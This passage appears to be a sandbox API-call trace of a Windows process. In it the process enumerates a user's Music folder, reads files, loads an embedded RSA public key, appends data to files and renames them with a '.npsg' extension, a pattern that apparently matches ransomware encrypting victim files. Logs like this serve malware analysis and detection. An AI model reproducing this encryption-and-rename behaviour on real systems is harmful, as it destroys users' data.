0x3373568 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400968 [0238.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0238.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400980 [0238.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400950 [0238.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34009e0 [0238.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009b0 [0238.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400998 [0238.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34009f8 [0238.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400998 | out: hHeap=0x620000) returned 1 [0238.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400998 [0238.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009b0 | out: hHeap=0x620000) returned 1 [0238.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400968 | out: hHeap=0x620000) returned 1 [0238.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400968 [0238.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0238.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009c8 | out: hHeap=0x620000) returned 1 [0238.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0238.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009f8 | out: hHeap=0x620000) returned 1 [0238.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0238.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0238.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0238.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400968 | out: hHeap=0x620000) returned 1 [0238.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0238.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400998 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009e0 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400980 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400950 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400938 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409b90 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.243] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x1fdb, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb14*=0x1fdb, lpOverlapped=0x0) returned 1 [0238.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.243] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1fe0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.243] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0238.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0238.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.244] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.244] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.244] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.244] CloseHandle (hObject=0x644) returned 1 [0238.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e728 [0238.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b83cd0 [0238.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e728 | out: hHeap=0x620000) returned 1 [0238.247] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\xb2T7DyZrvwJdpa.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\xb2t7dyzrvwjdpa.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\xb2T7DyZrvwJdpa.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\xb2t7dyzrvwjdpa.m4a.npsg")) returned 1 [0238.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.248] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0238.250] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x454f540, ftCreationTime.dwHighDateTime=0x1d5be77, ftLastAccessTime.dwLowDateTime=0x63809380, ftLastAccessTime.dwHighDateTime=0x1d5b9a9, ftLastWriteTime.dwLowDateTime=0x63809380, ftLastWriteTime.dwHighDateTime=0x1d5b9a9, nFileSizeHigh=0x0, nFileSizeLow=0x5d22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_3Sp4lIgrh-.mp3", cAlternateFileName="_3SP4L~1.MP3")) returned 1 [0238.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0238.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.250] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\_3Sp4lIgrh-.mp3") returned=".mp3" [0238.250] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\_3Sp4lIgrh-.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\_3sp4ligrh-.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.252] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=23842) returned 1 [0238.252] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.254] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5cfc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.254] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.256] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.256] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x5d22, lpOverlapped=0x0) returned 1 [0238.257] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.258] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.258] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.258] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.259] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.259] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.259] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.259] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.259] GetLastError () returned 0x0 [0238.259] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.259] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.259] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.259] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.259] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5d20) returned 0x3b83cd0 [0238.260] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409b90 [0238.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400938 [0238.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409bd8 [0238.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400950 [0238.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400980 [0238.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009e0 [0238.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400998 [0238.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.260] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400980 | out: hHeap=0x620000) returned 1 [0238.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400998 | out: hHeap=0x620000) returned 1 [0238.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009e0 | out: hHeap=0x620000) returned 1 [0238.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009e0 [0238.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0238.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400998 [0238.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400980 [0238.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0238.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0238.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0238.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400998 | out: hHeap=0x620000) returned 1 [0238.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400980 | out: hHeap=0x620000) returned 1 [0238.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009e0 | out: hHeap=0x620000) returned 1 [0238.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.262] GetCurrentThreadId () returned 0x5b4 [0238.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b83758 [0238.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.262] GetCurrentThreadId () returned 0x5b4 [0238.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) 